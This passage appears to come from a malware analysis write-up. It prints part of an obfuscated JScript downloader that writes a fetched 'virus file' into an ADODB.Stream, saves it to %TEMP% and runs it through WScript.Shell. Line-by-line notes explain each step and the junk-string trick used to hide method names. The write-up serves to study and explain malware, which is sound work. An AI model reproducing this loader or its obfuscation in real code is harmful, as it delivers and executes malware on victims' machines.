            var func4 = "" + "o" + ("fraternity", "manner", "simplified", "consent", "pen");    // = "open"
           
           //ADODB.Stream.open();
            hytSjp[func4](); 
            
            hytSjp.type = 0 + 3 - 2; // ADODB.Stream.type = 1
            var func5 = "w" + ("targets", "limply", "shell", "ri") + "te" ;  // = write
            var func6 = "" + ("numeral", "drawl", "tasteful", "R") + "es" + ("defender", "typewriter", "accumulates", "necessitate", "pon") + announcements + ("carolina", "ravage", "malediction", "e") + "Bo" + "dy";   // = "ResponseBody"
            
            //ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody);
            hytSjp[func5](QcarAWR[func6]);
            
            var func7 = (statement + "o" + "Di" + ("bracelet", "beast", "cheaper", "ti") + "on").replace("D", announcements); // = position
            hytSjp[func7] = 0;  // ADODB.Stream.position = 0
           var func8="s" + "av" + "eT" + ("scrimmage", "alliance", "oFile");  // = saveToFile
           
           // ADODB.Stream.saveToFile(FileName, adSaveCreateOverWrite);
            hytSjp[func8](transmit, 2);
            hytSjp.close();  // ADODB.Stream.close();
            
            //WScript.Shell.Run(strCommand, [intWindowStyle], [bWaitOnReturn])
            yzavYsf[BilRTKUok[thickI + 1]](transmit, 1, "TPYHPf" === "LDNSGABujeo");  // "TPYHPf" === "LDNSGABujeo"  means false
        }

    } 
    catch (cNINLnxTF) {
    console.log(cNINLnxTF);
    };

}

line 71 : sends Server API request to receive the Virus File

line 80 : the ADO Stream Object is used to read, write, and manage a stream of binary data or text. To know more, read here.
ADODB.Stream object is created to handle the binary data contents of the virus file.

line 80 : the contents of the virus file received via the XMLHttp Response object is written to the ADODB Stream.

line 99 : the ADODB Stream is saved to the file created in %TEMP% folder.

line 104 : the WshShell object is used to run the (Virus) file  created in the %TEMP% folder.



To see the full codebase, please check the github page here